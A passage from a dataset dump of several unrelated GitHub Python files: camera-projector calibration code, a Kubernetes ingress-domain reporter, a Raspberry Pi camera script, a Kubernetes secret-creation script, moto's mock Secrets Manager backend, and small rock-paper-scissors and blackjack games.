намиране на ъглите на квадратите\n def stereoFindChessboardCorners(self, chessboardSize):\n # !!!ВАЖНО: горе с calibrate, има описания какво означават тези редове\n objp = np.zeros((chessboardSize[0]*chessboardSize[1],3), np.float32)\n objp[:,:2] = np.mgrid[0:chessboardSize[0],0:chessboardSize[1]].T.reshape(-1,2)\n objpoints = [] # 3d point in real world space\n imgpoints = [] # 2d points in image plane.\n\n # Взимане на imgpoints за камерата\n fname = natsorted(glob.glob('{0}/{1}'.format(self.STEREO_CALIBRATION_DIR,'image*.jpg')))[0]\n img = self.loadImage(fname)\n ret, corners = cv.findChessboardCorners(img,(chessboardSize[0],chessboardSize[1]), None)\n if ret == True:\n objpoints.append(objp)\n imgpoints.append(corners)\n else:\n raise ValueError('Not good image for stereo calibration!')\n camImgpoints = imgpoints\n\n # Взимане на imgpoints за проектора. Тук шаблона се представя като това, което е заснето от камерата\n img = self.loadImage(Projector.CALIBRATION_DIR + Projector.TMP_PATTERN_FILE_NAME)\n img = ndimage.rotate(img, 90) # Завъртане, защото проектора го използва вертикално, за да го покаже хоризонтално\n ret, corners = cv.findChessboardCorners(img,(chessboardSize[0],chessboardSize[1]), None)\n if ret == True:\n objpoints.append(objp)\n imgpoints.append(corners)\n else:\n raise ValueError('Not good image for stereo calibration!')\n projImgpoints = imgpoints\n\n return (objpoints, camImgpoints, projImgpoints)\n\n # Калибриране на изображението\n def undistortImage(self, img, calibrationRes, calibrationDir=None):\n # Премахване на изкривяването\n dst = cv.undistort(img, calibrationRes[\"matrix\"], calibrationRes[\"distortion\"], img.shape[:1], calibrationRes[\"matrix\"])#newCameraMatrix\n\n # СПИРА СЕ ИЗРЯЗВАНЕТО ПО ROI, ЗАЩОТО ВИНАГИ ТРЯБВА ПЪЛНОТО ИЗОБРАЖЕНИЕ\n # СЪЩО stereoRectify ВРЪЩА ВИНАГИ 0,0,0,0 И ТРЯБВА ДА СЕ ОПРАВИ, АКО ЩЕ СЕ ПРИЛАГА ИЗРЯЗВАНЕ НА НЕВАЛИДНИ ПИКСЕЛИ\n # Изрязване на изображението. Всяка стойност е масив, затова с flatten се преобразува от 2D в 1D масив\n # x,y,w,h = calibrationRes[\"roi\"].flatten().astype(int)\n # dst = dst[y:y+h, x:x+w]\n\n if calibrationDir != None:\n cv.imwrite(calibrationDir + self.CALIBRATION_RES_IMAGE, dst)\n print(\"Done!\")\n return dst\n\n \"\"\"\n Записесне на резултатите от калбирането във файл\n \"\"\"\n def writeCalibrationResult(self, calibrationDir, calibrationRes):\n # отваряне на файл за записване на резултата от калибрацията\n fs = cv.FileStorage(calibrationDir + self.CALIBRATION_FILE, cv.FILE_STORAGE_WRITE)\n # Параметри на камерата\n fs.write('shape', calibrationRes[\"shape\"])\n fs.write('matrix', calibrationRes[\"matrix\"])\n fs.write('distortion', calibrationRes[\"distortion\"])\n fs.write('newCameraMatrix', calibrationRes[\"newCameraMatrix\"])\n fs.write('roi', calibrationRes[\"roi\"])\n fs.write('error', calibrationRes[\"error\"])\n fs.release()\n\n \"\"\"\n Записесне на резултатите от stereo калбирането във файл\n \"\"\"\n def writeStereoCalibrationResult(self, stereoCalibrationRes):\n # отваряне на файл за записване на резултата от калибрацията\n fs = cv.FileStorage(self.STEREO_CALIBRATION_DIR + self.STEREO_CALIBRATION_FILE, cv.FILE_STORAGE_WRITE)\n # Параметри на камерата\n fs.write('cShape', stereoCalibrationRes[\"cShape\"])\n fs.write('pShape', stereoCalibrationRes[\"pShape\"])\n fs.write('cameraMatrix', stereoCalibrationRes[\"cameraMatrix\"])\n fs.write('cameraDistortion', stereoCalibrationRes[\"cameraDistortion\"])\n fs.write('cRoi', stereoCalibrationRes[\"cRoi\"])\n fs.write('projectorMatrix', stereoCalibrationRes[\"projectorMatrix\"])\n fs.write('projectorDistortion', stereoCalibrationRes[\"projectorDistortion\"])\n fs.write('pRoi', stereoCalibrationRes[\"pRoi\"])\n fs.write('r_matrix', stereoCalibrationRes[\"r_matrix\"])\n fs.write('t_vecs', stereoCalibrationRes[\"t_vecs\"])\n fs.write('disparityToDepthMatrix', stereoCalibrationRes[\"disparityToDepthMatrix\"])\n fs.release()\n\n \"\"\"\n Прочитане на резултатите от калбирането\n \"\"\"\n def readCalibrationResult(self, calibrationDir):\n calibResulPath = calibrationDir + self.CALIBRATION_FILE\n file_exists = os.path.exists(calibResulPath)\n\n calibrationRes = None\n if file_exists:\n # отваряне на файл за записване на резултата от калибрацията\n fs = cv.FileStorage(calibResulPath, cv.FILE_STORAGE_READ)\n # Параметри на камерата\n calibrationRes = {\n \"shape\" : tuple(fs.getNode('shape').mat().astype(int).flatten()),\n \"matrix\" : fs.getNode('matrix').mat(),\n \"distortion\" : fs.getNode('distortion').mat(),\n \"newCameraMatrix\" : fs.getNode('newCameraMatrix').mat(),\n \"roi\" : fs.getNode('roi').mat(),\n \"error\" : fs.getNode('error').real()\n }\n return calibrationRes\n\n \"\"\"\n Прочитане на резултатите от stereo калбирането\n \"\"\"\n def readStereoCalibrationResult(self):\n stereoCalibResulPath = self.STEREO_CALIBRATION_DIR + self.STEREO_CALIBRATION_FILE\n file_exists = os.path.exists(stereoCalibResulPath)\n\n stereoCalibrationRes = None\n if file_exists:\n # отваряне на файл за записване на резултата от калибрацията\n fs = cv.FileStorage(stereoCalibResulPath, cv.FILE_STORAGE_READ)\n # Параметри на камерата\n stereoCalibrationRes = {\n \"cShape\" : tuple(fs.getNode('cShape').mat().astype(int).flatten()),\n \"pShape\" : tuple(fs.getNode('pShape').mat().astype(int).flatten()),\n \"cameraMatrix\" : fs.getNode('cameraMatrix').mat(),\n \"cameraDistortion\" : fs.getNode('cameraDistortion').mat(),\n \"cRoi\" : fs.getNode('cRoi').mat(),\n \"projectorMatrix\" : fs.getNode('projectorMatrix').mat(),\n \"projectorDistortion\" : fs.getNode('projectorDistortion').mat(),\n \"pRoi\" : fs.getNode('pRoi').mat(),\n \"r_matrix\" : fs.getNode('r_matrix').mat(),\n \"t_vecs\" : fs.getNode('t_vecs').mat(),\n \"disparityToDepthMatrix\" : fs.getNode('disparityToDepthMatrix').mat()\n }\n return stereoCalibrationRes\n","repo_name":"ElitsaVenchova/Scan-y","sub_path":"Scan-y/structuredlight/cameraPi.py","file_name":"cameraPi.py","file_ext":"py","file_size_in_byte":23461,"program_lang":"python","lang":"bg","doc_type":"code","stars":1,"dataset":"github-code","pt":"44"} +{"seq_id":"71498418052","text":"#!/usr/bin/env python3\n\nimport logging\nimport time\nimport requests\nimport os\nfrom kubernetes import client, config, watch\n\n\nVERSION = '0.0.1'\nSSLSUPERVISOR_CLUSTER_NAME = os.getenv('SSLSUPERVISOR_CLUSTER_NAME')\nSSLSUPERVISOR_API_KEY = os.getenv('SSLSUPERVISOR_API_KEY')\nWAIT_TIME = 300\n\n\nlogging.basicConfig(level=logging.INFO)\nlogger = logging.getLogger(__name__)\n\n\nif __name__ == \"__main__\":\n logger.info('Starting...')\n\n logger.info('Loading Kubernetes Config')\n\n config.load_incluster_config()\n\n api_client = client.ApiClient()\n api_instance = client.NetworkingV1Api(api_client)\n\n while True:\n logger.info('Listing ingresses')\n ingress_response = api_instance.list_ingress_for_all_namespaces()\n \n domains = []\n for ingress in ingress_response.items:\n for rule in ingress.spec.rules:\n domains.append(rule.host)\n\n logger.info('Listing ingresses done')\n logger.info(domains)\n\n try:\n r = requests.post(\n 'https://sslsupervisor.api.apocode.io/api/v1/identity/integrations/kubernetes/callback',\n json={\n 'kubernetes_cluster_name': os.getenv('SSLSUPERVISOR_CLUSTER_NAME'),\n 'kubernetes_data': domains,\n 'kubernetes_integration_version': VERSION,\n },\n headers = {\n 'X-Apo-Api-Key': os.getenv('SSLSUPERVISOR_API_KEY'),\n }\n )\n logger.info(r.json())\n r.raise_for_status()\n\n logger.info(f'Done!')\n\n except Exception as e:\n logger.error(e)\n logger.info(f'Failed. See error above.')\n\n\n logger.info(f'Waiting {WAIT_TIME} second before next update...')\n time.sleep(WAIT_TIME)\n \n","repo_name":"ApocodeHQ/sslsupervisor-kubernetes-collector","sub_path":"src/job.py","file_name":"job.py","file_ext":"py","file_size_in_byte":1822,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"7627684338","text":"import picamera\nimport time\n#camera = picamera.PiCamera()\n#Setup camera such as it closes when we are done with it.\nprint(\"Picture about to be taken\")\nseconds = time.time()\nmypic = open('/home/pi/scripts/images/image_'+str(time)+'.jpg','wb')\nwith picamera.PiCamera() as camera:\n camera.resolution = (1280,720)\n camera.start_preview()\n #camera warm up time\n time.sleep(2)\n camera.capture(mypic);\n\nmypic.close()\nprint(\"picture taken\")\n","repo_name":"vmishra2018/hes-e90","sub_path":"src/camera.py","file_name":"camera.py","file_ext":"py","file_size_in_byte":448,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"74864446534","text":"import subprocess\nfrom datetime import datetime\n\nnamespaces = [\"\"]\n\ndef get_namespace_uid(namespace):\n try:\n result = subprocess.run(['kubectl', 'get', 'namespace', namespace, '-o', 'jsonpath={.metadata.uid}'], capture_output=True, text=True, check=True)\n namespace_uid = result.stdout.strip()\n return namespace_uid\n except subprocess.CalledProcessError as e:\n print(f\"Error getting UID for namespace {namespace}: {e}\")\n return None\n\ndef create_secret(namespace, secret_name, secret_data):\n try:\n subprocess.run(['kubectl', 'create', 'secret', 'generic', secret_name, '--from-literal=token='+secret_data, '--namespace='+namespace], check=True)\n print(f\"Secret {secret_name} created in namespace {namespace}\")\n except subprocess.CalledProcessError as e:\n print(f\"Error creating secret {secret_name} in namespace {namespace}: {e}\")\n\ndef apply_commands_in_each_namespace(namespaces):\n for namespace in namespaces:\n namespace_uid = get_namespace_uid(namespace)\n if namespace_uid:\n current_date = datetime.now()\n secret_name = f\"{namespace}-token-{current_date.strftime('%m-%Y')}\"\n secret_data = f\"some-random-token-{namespace_uid}\"\n create_secret(namespace, secret_name, secret_data)\n\nif __name__ == \"__main__\":\n # List of Kubernetes namespaces\n kubernetes_namespaces = ['fa', 'fl', 'lo', 'mr', 'w', 'ds']\n\n apply_commands_in_each_namespace(kubernetes_namespaces)\n\n","repo_name":"inkstom/go-token","sub_path":"script.py","file_name":"script.py","file_ext":"py","file_size_in_byte":1499,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"72118788613","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nimport time\nimport json\nimport uuid\nimport datetime\n\nfrom boto3 import Session\n\nfrom moto.core import BaseBackend, BaseModel\nfrom .exceptions import (\n SecretNotFoundException,\n SecretHasNoValueException,\n InvalidParameterException,\n ResourceExistsException,\n ResourceNotFoundException,\n InvalidRequestException,\n ClientError,\n)\nfrom .utils import random_password, secret_arn, get_secret_name_from_arn\nfrom .list_secrets.filters import all, tag_key, tag_value, description, name\n\n\n_filter_functions = {\n \"all\": all,\n \"name\": name,\n \"description\": description,\n \"tag-key\": tag_key,\n \"tag-value\": tag_value,\n}\n\n\ndef filter_keys():\n return list(_filter_functions.keys())\n\n\ndef _matches(secret, filters):\n is_match = True\n\n for f in filters:\n # Filter names are pre-validated in the resource layer\n filter_function = _filter_functions.get(f[\"Key\"])\n is_match = is_match and filter_function(secret, f[\"Values\"])\n\n return is_match\n\n\nclass SecretsManager(BaseModel):\n def __init__(self, region_name, **kwargs):\n self.region = region_name\n\n\nclass FakeSecret:\n def __init__(\n self,\n region_name,\n secret_id,\n secret_string=None,\n secret_binary=None,\n description=None,\n tags=[],\n version_id=None,\n version_stages=None,\n ):\n self.secret_id = secret_id\n self.name = secret_id\n self.arn = secret_arn(region_name, secret_id)\n self.secret_string = secret_string\n self.secret_binary = secret_binary\n self.description = description\n self.tags = tags\n self.version_id = version_id\n self.version_stages = version_stages\n self.rotation_enabled = False\n self.rotation_lambda_arn = \"\"\n self.auto_rotate_after_days = 0\n self.deleted_date = None\n\n def update(self, description=None, tags=[]):\n self.description = description\n self.tags = tags\n\n def set_versions(self, versions):\n self.versions = versions\n\n def set_default_version_id(self, version_id):\n self.default_version_id = version_id\n\n def reset_default_version(self, secret_version, version_id):\n # remove all old AWSPREVIOUS stages\n for old_version in self.versions.values():\n if \"AWSPREVIOUS\" in old_version[\"version_stages\"]:\n old_version[\"version_stages\"].remove(\"AWSPREVIOUS\")\n\n # set old AWSCURRENT secret to AWSPREVIOUS\n previous_current_version_id = self.default_version_id\n self.versions[previous_current_version_id][\"version_stages\"] = [\"AWSPREVIOUS\"]\n\n self.versions[version_id] = secret_version\n self.default_version_id = version_id\n\n def delete(self, deleted_date):\n self.deleted_date = deleted_date\n\n def restore(self):\n self.deleted_date = None\n\n def is_deleted(self):\n return self.deleted_date is not None\n\n def to_short_dict(self, include_version_stages=False):\n dct = {\n \"ARN\": self.arn,\n \"Name\": self.name,\n \"VersionId\": self.default_version_id,\n }\n if include_version_stages:\n dct[\"VersionStages\"] = self.version_stages\n return json.dumps(dct)\n\n def to_dict(self):\n version_id_to_stages = self._form_version_ids_to_stages()\n\n return {\n \"ARN\": self.arn,\n \"Name\": self.name,\n \"Description\": self.description or \"\",\n \"KmsKeyId\": \"\",\n \"RotationEnabled\": self.rotation_enabled,\n \"RotationLambdaARN\": self.rotation_lambda_arn,\n \"RotationRules\": {\"AutomaticallyAfterDays\": self.auto_rotate_after_days},\n \"LastRotatedDate\": None,\n \"LastChangedDate\": None,\n \"LastAccessedDate\": None,\n \"DeletedDate\": self.deleted_date,\n \"Tags\": self.tags,\n \"VersionIdsToStages\": version_id_to_stages,\n \"SecretVersionsToStages\": version_id_to_stages,\n }\n\n def _form_version_ids_to_stages(self):\n version_id_to_stages = {}\n for key, value in self.versions.items():\n version_id_to_stages[key] = value[\"version_stages\"]\n\n return version_id_to_stages\n\n\nclass SecretsStore(dict):\n def __setitem__(self, key, value):\n new_key = get_secret_name_from_arn(key)\n super(SecretsStore, self).__setitem__(new_key, value)\n\n def __getitem__(self, key):\n new_key = get_secret_name_from_arn(key)\n return super(SecretsStore, self).__getitem__(new_key)\n\n def __contains__(self, key):\n new_key = get_secret_name_from_arn(key)\n return dict.__contains__(self, new_key)\n\n def pop(self, key, *args, **kwargs):\n new_key = get_secret_name_from_arn(key)\n return super(SecretsStore, self).pop(new_key, *args, **kwargs)\n\n\nclass SecretsManagerBackend(BaseBackend):\n def __init__(self, region_name=None, **kwargs):\n super(SecretsManagerBackend, self).__init__()\n self.region = region_name\n self.secrets = SecretsStore()\n\n def reset(self):\n region_name = self.region\n self.__dict__ = {}\n self.__init__(region_name)\n\n def _is_valid_identifier(self, identifier):\n return identifier in self.secrets\n\n def _unix_time_secs(self, dt):\n epoch = datetime.datetime.utcfromtimestamp(0)\n return (dt - epoch).total_seconds()\n\n def get_secret_value(self, secret_id, version_id, version_stage):\n if not self._is_valid_identifier(secret_id):\n raise SecretNotFoundException()\n\n if not version_id and version_stage:\n # set version_id to match version_stage\n versions_dict = self.secrets[secret_id].versions\n for ver_id, ver_val in versions_dict.items():\n if version_stage in ver_val[\"version_stages\"]:\n version_id = ver_id\n break\n if not version_id:\n raise SecretNotFoundException()\n\n # TODO check this part\n if self.secrets[secret_id].is_deleted():\n raise InvalidRequestException(\n \"An error occurred (InvalidRequestException) when calling the GetSecretValue operation: You tried to \\\n perform the operation on a secret that's currently marked deleted.\"\n )\n\n secret = self.secrets[secret_id]\n version_id = version_id or secret.default_version_id\n\n secret_version = secret.versions.get(version_id)\n if not secret_version:\n raise ResourceNotFoundException(\n \"An error occurred (ResourceNotFoundException) when calling the GetSecretValue operation: Secrets \"\n \"Manager can't find the specified secret value for VersionId: {}\".format(\n version_id\n )\n )\n\n response_data = {\n \"ARN\": secret.arn,\n \"Name\": secret.name,\n \"VersionId\": secret_version[\"version_id\"],\n \"VersionStages\": secret_version[\"version_stages\"],\n \"CreatedDate\": secret_version[\"createdate\"],\n }\n\n if \"secret_string\" in secret_version:\n response_data[\"SecretString\"] = secret_version[\"secret_string\"]\n\n if \"secret_binary\" in secret_version:\n response_data[\"SecretBinary\"] = secret_version[\"secret_binary\"]\n\n if (\n \"secret_string\" not in secret_version\n and \"secret_binary\" not in secret_version\n ):\n raise SecretHasNoValueException(version_stage or \"AWSCURRENT\")\n\n response = json.dumps(response_data)\n\n return response\n\n def update_secret(\n self, secret_id, secret_string=None, secret_binary=None, **kwargs\n ):\n\n # error if secret does not exist\n if secret_id not in self.secrets.keys():\n raise SecretNotFoundException()\n\n if self.secrets[secret_id].is_deleted():\n raise InvalidRequestException(\n \"An error occurred (InvalidRequestException) when calling the UpdateSecret operation: \"\n \"You can't perform this operation on the secret because it was marked for deletion.\"\n )\n\n secret = self.secrets[secret_id]\n tags = secret.tags\n description = secret.description\n\n secret = self._add_secret(\n secret_id,\n secret_string=secret_string,\n secret_binary=secret_binary,\n description=description,\n tags=tags,\n )\n\n return secret.to_short_dict()\n\n def create_secret(\n self,\n name,\n secret_string=None,\n secret_binary=None,\n description=None,\n tags=[],\n **kwargs\n ):\n\n # error if secret exists\n if name in self.secrets.keys():\n raise ResourceExistsException(\n \"A resource with the ID you requested already exists.\"\n )\n\n secret = self._add_secret(\n name,\n secret_string=secret_string,\n secret_binary=secret_binary,\n description=description,\n tags=tags,\n )\n\n return secret.to_short_dict()\n\n def _add_secret(\n self,\n secret_id,\n secret_string=None,\n secret_binary=None,\n description=None,\n tags=[],\n version_id=None,\n version_stages=None,\n ):\n\n if version_stages is None:\n version_stages = [\"AWSCURRENT\"]\n\n if not version_id:\n version_id = str(uuid.uuid4())\n\n secret_version = {\n \"createdate\": int(time.time()),\n \"version_id\": version_id,\n \"version_stages\": version_stages,\n }\n if secret_string is not None:\n secret_version[\"secret_string\"] = secret_string\n\n if secret_binary is not None:\n secret_version[\"secret_binary\"] = secret_binary\n\n if secret_id in self.secrets:\n secret = self.secrets[secret_id]\n secret.update(description, tags)\n secret.reset_default_version(secret_version, version_id)\n else:\n secret = FakeSecret(\n region_name=self.region,\n secret_id=secret_id,\n secret_string=secret_string,\n secret_binary=secret_binary,\n description=description,\n tags=tags,\n )\n secret.set_versions({version_id: secret_version})\n secret.set_default_version_id(version_id)\n self.secrets[secret_id] = secret\n\n return secret\n\n def put_secret_value(self, secret_id, secret_string, secret_binary, version_stages):\n\n if not self._is_valid_identifier(secret_id):\n raise SecretNotFoundException()\n else:\n secret = self.secrets[secret_id]\n tags = secret.tags\n description = secret.description\n\n secret = self._add_secret(\n secret_id,\n secret_string,\n secret_binary,\n description=description,\n tags=tags,\n version_stages=version_stages,\n )\n\n return secret.to_short_dict(include_version_stages=True)\n\n def describe_secret(self, secret_id):\n if not self._is_valid_identifier(secret_id):\n raise SecretNotFoundException()\n\n secret = self.secrets[secret_id]\n\n return json.dumps(secret.to_dict())\n\n def rotate_secret(\n self,\n secret_id,\n client_request_token=None,\n rotation_lambda_arn=None,\n rotation_rules=None,\n ):\n\n rotation_days = \"AutomaticallyAfterDays\"\n\n if not self._is_valid_identifier(secret_id):\n raise SecretNotFoundException()\n\n if self.secrets[secret_id].is_deleted():\n raise InvalidRequestException(\n \"An error occurred (InvalidRequestException) when calling the RotateSecret operation: You tried to \\\n perform the operation on a secret that's currently marked deleted.\"\n )\n\n if client_request_token:\n token_length = len(client_request_token)\n if token_length < 32 or token_length > 64:\n msg = \"ClientRequestToken \" \"must be 32-64 characters long.\"\n raise InvalidParameterException(msg)\n\n if rotation_lambda_arn:\n if len(rotation_lambda_arn) > 2048:\n msg = \"RotationLambdaARN \" \"must <= 2048 characters long.\"\n raise InvalidParameterException(msg)\n\n if rotation_rules:\n if rotation_days in rotation_rules:\n rotation_period = rotation_rules[rotation_days]\n if rotation_period < 1 or rotation_period > 1000:\n msg = (\n \"RotationRules.AutomaticallyAfterDays \" \"must be within 1-1000.\"\n )\n raise InvalidParameterException(msg)\n\n secret = self.secrets[secret_id]\n\n old_secret_version = secret.versions[secret.default_version_id]\n new_version_id = client_request_token or str(uuid.uuid4())\n\n self._add_secret(\n secret_id,\n old_secret_version[\"secret_string\"],\n description=secret.description,\n tags=secret.tags,\n version_id=new_version_id,\n version_stages=[\"AWSCURRENT\"],\n )\n\n secret.rotation_lambda_arn = rotation_lambda_arn or \"\"\n if rotation_rules:\n secret.auto_rotate_after_days = rotation_rules.get(rotation_days, 0)\n if secret.auto_rotate_after_days > 0:\n secret.rotation_enabled = True\n\n if \"AWSCURRENT\" in old_secret_version[\"version_stages\"]:\n old_secret_version[\"version_stages\"].remove(\"AWSCURRENT\")\n\n return secret.to_short_dict()\n\n def get_random_password(\n self,\n password_length,\n exclude_characters,\n exclude_numbers,\n exclude_punctuation,\n exclude_uppercase,\n exclude_lowercase,\n include_space,\n require_each_included_type,\n ):\n # password size must have value less than or equal to 4096\n if password_length > 4096:\n raise ClientError(\n \"ClientError: An error occurred (ValidationException) \\\n when calling the GetRandomPassword operation: 1 validation error detected: Value '{}' at 'passwordLength' \\\n failed to satisfy constraint: Member must have value less than or equal to 4096\".format(\n password_length\n )\n )\n if password_length < 4:\n raise InvalidParameterException(\n \"InvalidParameterException: An error occurred (InvalidParameterException) \\\n when calling the GetRandomPassword operation: Password length is too short based on the required types.\"\n )\n\n response = json.dumps(\n {\n \"RandomPassword\": random_password(\n password_length,\n exclude_characters,\n exclude_numbers,\n exclude_punctuation,\n exclude_uppercase,\n exclude_lowercase,\n include_space,\n require_each_included_type,\n )\n }\n )\n\n return response\n\n def list_secret_version_ids(self, secret_id):\n secret = self.secrets[secret_id]\n\n version_list = []\n for version_id, version in secret.versions.items():\n version_list.append(\n {\n \"CreatedDate\": int(time.time()),\n \"LastAccessedDate\": int(time.time()),\n \"VersionId\": version_id,\n \"VersionStages\": version[\"version_stages\"],\n }\n )\n\n response = json.dumps(\n {\n \"ARN\": secret.secret_id,\n \"Name\": secret.name,\n \"NextToken\": \"\",\n \"Versions\": version_list,\n }\n )\n\n return response\n\n def list_secrets(self, filters, max_results, next_token):\n # TODO implement pagination and limits\n\n secret_list = []\n for secret in self.secrets.values():\n if _matches(secret, filters):\n secret_list.append(secret.to_dict())\n\n return secret_list, None\n\n def delete_secret(\n self, secret_id, recovery_window_in_days, force_delete_without_recovery\n ):\n\n if not self._is_valid_identifier(secret_id):\n raise SecretNotFoundException()\n\n if self.secrets[secret_id].is_deleted():\n raise InvalidRequestException(\n \"An error occurred (InvalidRequestException) when calling the DeleteSecret operation: You tried to \\\n perform the operation on a secret that's currently marked deleted.\"\n )\n\n if recovery_window_in_days and force_delete_without_recovery:\n raise InvalidParameterException(\n \"An error occurred (InvalidParameterException) when calling the DeleteSecret operation: You can't \\\n use ForceDeleteWithoutRecovery in conjunction with RecoveryWindowInDays.\"\n )\n\n if recovery_window_in_days and (\n recovery_window_in_days < 7 or recovery_window_in_days > 30\n ):\n raise InvalidParameterException(\n \"An error occurred (InvalidParameterException) when calling the DeleteSecret operation: The \\\n RecoveryWindowInDays value must be between 7 and 30 days (inclusive).\"\n )\n\n deletion_date = datetime.datetime.utcnow()\n\n if force_delete_without_recovery:\n secret = self.secrets.pop(secret_id, None)\n else:\n deletion_date += datetime.timedelta(days=recovery_window_in_days or 30)\n self.secrets[secret_id].delete(self._unix_time_secs(deletion_date))\n secret = self.secrets.get(secret_id, None)\n\n if not secret:\n raise SecretNotFoundException()\n\n arn = secret.arn\n name = secret.name\n\n return arn, name, self._unix_time_secs(deletion_date)\n\n def restore_secret(self, secret_id):\n\n if not self._is_valid_identifier(secret_id):\n raise SecretNotFoundException()\n\n secret = self.secrets[secret_id]\n secret.restore()\n\n return secret.arn, secret.name\n\n def tag_resource(self, secret_id, tags):\n\n if secret_id not in self.secrets.keys():\n raise SecretNotFoundException()\n\n secret = self.secrets[secret_id]\n old_tags = secret.tags\n\n for tag in tags:\n old_tags.append(tag)\n\n return secret_id\n\n @staticmethod\n def get_resource_policy(secret_id):\n resource_policy = {\n \"Version\": \"2012-10-17\",\n \"Statement\": {\n \"Effect\": \"Allow\",\n \"Principal\": {\n \"AWS\": [\n \"arn:aws:iam::111122223333:root\",\n \"arn:aws:iam::444455556666:root\",\n ]\n },\n \"Action\": [\"secretsmanager:GetSecretValue\"],\n \"Resource\": \"*\",\n },\n }\n return json.dumps(\n {\n \"ARN\": secret_id,\n \"Name\": secret_id,\n \"ResourcePolicy\": json.dumps(resource_policy),\n }\n )\n\n\nsecretsmanager_backends = {}\nfor region in Session().get_available_regions(\"secretsmanager\"):\n secretsmanager_backends[region] = SecretsManagerBackend(region_name=region)\nfor region in Session().get_available_regions(\n \"secretsmanager\", partition_name=\"aws-us-gov\"\n):\n secretsmanager_backends[region] = SecretsManagerBackend(region_name=region)\nfor region in Session().get_available_regions(\n \"secretsmanager\", partition_name=\"aws-cn\"\n):\n secretsmanager_backends[region] = SecretsManagerBackend(region_name=region)\n","repo_name":"jweite/moto_bpandola","sub_path":"moto/secretsmanager/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":20087,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"44"} +{"seq_id":"36301204023","text":"#!/usr/bin/env python3\n# Steven Vandegrift 2022\n\nimport random\nimport os\n\nplaying = True\n\ndef find_winner(player, com):\n\tif player == com:\n\t\tprint(\"It's a tie!\")\n\telif player == 1 and com == 2: #Rock vs Paper\n\t\tprint(\"ROCK VS PAPER\")\n\t\tprint(\"Paper beats Rock, Computer Wins!\")\n\telif player == 1 and com == 3: #Rock vs Scissors:\n\t\tprint(\"ROCK VS SCISSORS\")\n\t\tprint(\"Rock beats Scissors, Player Wins!\")\n\telif player == 2 and com == 1: #Paper vs Rock\n\t\tprint(\"PAPER VS ROCK\")\n\t\tprint(\"Paper beats Rock, Player Wins!\")\n\telif player == 2 and com == 3: #Paper vs Scissors\n\t\tprint(\"PAPER VS SCISSORS\")\n\t\tprint(\"Scissors beats Paper, Computer Wins!\")\n\telif player == 3 and com == 1:\n\t\tprint(\"SCISSORS VS ROCK\")\n\t\tprint(\"Rock beats Scissors, Computer Wins!\")\n\telif player == 3 and com == 2:\n\t\tprint(\"PAPER VS SCISSORS\")\n\t\tprint(\"Scissors beats Paper, Player Wins!\")\n\nwhile playing: \n\tuser_choice = input(\"Pick 'Rock', 'Paper', or 'Scissors' \\n\")\n\tcomputer_choice = random.randint(1, 3)\n\tif user_choice.lower() == 'rock':\n\t\tuser_choice = 1\n\telif user_choice.lower() == 'paper':\n\t\tuser_choice = 2\n\telif user_choice.lower() == 'scissors':\n\t\tuser_choice = 3\n\telse:\n\t\tprint(\"That was not an option, try again\")\n\t\tos.system('clear')\n\tfind_winner(user_choice, computer_choice)\n\tkeep_playing = input(\"Want to play again? 'y' or 'n'\\n\")\n\tos.system('clear')\n\tif keep_playing == 'n':\n\t\tplaying = False\n\t\t\n\t","repo_name":"sjvandy/Rock_Paper_Scissors","sub_path":"Rock_Paper_Scissors.py","file_name":"Rock_Paper_Scissors.py","file_ext":"py","file_size_in_byte":1387,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"14959276566","text":"#!/bin/python\n\nimport deck as d\nimport gui\nfrom tkinter import *\nfrom tkinter import ttk, messagebox\n\nimport sys\nfrom threading import Thread\nfrom time import sleep\n\ndef main(argv, nogui=False):\n if nogui:\n n = \"\"\n while type(n) != int:\n try:\n inp = int(input(\"How many players will play? \"))\n except ValueError:\n pass\n else:\n if 0 < inp <= 5:\n n = inp\n else:\n root, casinoTable, uname, bal, score, bet = gui.generateGUI()\n\n def dismiss():\n dlg.grab_release()\n dlg.destroy()\n\n n = [1]\n def retrieve(*arg):\n try:\n n[0] = int(n_player.get())\n except:\n pass\n else:\n if 0 < n[0] <= 5:\n dismiss()\n\n dlg = Toplevel(root)\n ttk.Label(dlg, text=\"Number of players:\").grid(column=0, row=0, padx=5, pady=5)\n n_player = StringVar()\n n_entry = ttk.Entry(dlg, textvariable=n_player)\n n_entry.grid(column=1, row=0, padx=5, pady=5)\n ttk.Button(dlg, text=\"Submit\", command=retrieve).grid(column=0, row=1, columnspan=2, padx=5, pady=5)\n dlg.protocol(\"WM_DELETE_WINDOW\", dismiss) # intercept close button\n dlg.transient(root) # dialog window is related to main\n dlg.wait_visibility() # can't grab until window appears, so we wait\n dlg.grab_set() # ensure all input goes to our window\n n_entry.focus()\n dlg.bind(\"\", retrieve)\n dlg.wait_window() # block until window is destroyed\n\n n = n[0]\n \n if nogui:\n if len(argv) > 1:\n players = p.initPlayers(n, int(argv[1]))\n else:\n players = p.initPlayers(n)\n else:\n if len(argv) > 1:\n players = p.initPlayers(n, root, int(argv[1]))\n else:\n players = p.initPlayers(n, root)\n deck = d.initStack(n)\n \n if nogui:\n playing = True\n while playing:\n gm.completeGame(players, deck)\n playing = input(\"replay? [y/N] \").lower() in [\"yes\", \"y\"]\n if playing and players == {}:\n print(\"No players have got money anymore, exiting.\")\n playing = False\n\n\n form = f\"┤ Recap for players that didn't go broke ├\"\n print(f\"{form:{'─'}^80s}\" + \"\\b╮\\r╭\")\n for name, player in players.items():\n form = f\"│{name} won {player['wins']} game{'' if player['wins'] == 1 else 's'} out of {len(player['score'])} with a final balance of ${player['balance']:.2f}\"\n print(f\"{form:{' '}<80s}\" + \"\\b│\")\n print(f\"{'':{'─'}^80s}\" + \"\\b╯\\r╰\")\n else:\n t = Thread(target=game, args=(players, deck, root, casinoTable, uname, bal, score, bet), daemon=True)\n t.start()\n root.mainloop()\n t.join(timeout=1)\n sys.exit()\n\n \ndef game(players, deck, root, casinoTable, uname, bal, score, bet):\n playing = True\n while playing:\n winners, blackJack = gm.completeGame(players, deck, {'root': root, 'table': casinoTable, 'uname': uname, 'bal':bal, 